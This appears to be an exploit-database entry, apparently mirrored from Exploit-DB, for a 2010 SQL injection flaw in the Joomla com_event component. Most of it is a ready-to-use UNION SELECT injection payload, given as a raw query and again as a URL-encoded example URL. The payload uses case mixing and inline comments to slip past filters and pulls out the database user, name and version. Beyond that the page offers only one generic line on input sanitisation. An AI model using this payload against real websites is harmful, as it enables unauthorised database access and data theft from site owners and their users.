header-logo
Suggest Exploit
vendor:
Joomla Component com_event
by:
N/A
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: Joomla Component com_event
Affected Version From: Multiple versions
Affected Version To: Multiple versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_event another sql injection vuln

The Attacker Can Exploit A SQL injection vuln in the following: The Sql injection query: index.php?option=com_event&task=view&id=-14 UnioN/**/SelECt 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4-- Example: http://[site]/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4--

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_event another sql injection vuln
# Date: 17/5/2010
# Author: N/A
# Software Link: www.joomla.org/download.html
# Version: Multible versions

# Code :
The Attacker Can Exploit A SQL injection vuln in the following:


The Sql injection query:

index.php?option=com_event&task=view&id=-14 UnioN/**/SelECt 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--

Example:

http://[site]/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4--

Thanks To All Muslims

h8k@hotmail.it

Navigation

Suggest Exploit

Services By CQR